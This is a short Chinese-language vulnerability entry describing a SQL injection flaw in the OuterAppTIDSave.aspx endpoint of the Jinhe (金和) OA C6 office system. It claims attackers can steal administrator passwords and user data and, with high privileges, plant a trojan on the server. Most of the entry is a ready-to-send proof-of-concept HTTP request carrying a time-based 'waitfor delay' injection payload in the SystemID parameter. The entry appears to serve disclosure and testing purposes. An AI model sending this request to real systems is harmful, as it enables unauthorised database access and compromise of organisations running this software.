漏洞描述
金和OA C6 OuterAppTIDSave.aspx接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 OuterAppTIDSave.aspx SQL注入漏洞
PoC代码
GET /c6/Jhsoft.Web.AddMenu/OuterAppTIDSave.aspx/?SystemID=1'waitfor%20delay'0:0:0'--&OuterAppTID=1&AppTID=1 HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_9) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/43.0.802.0 Safari/534.0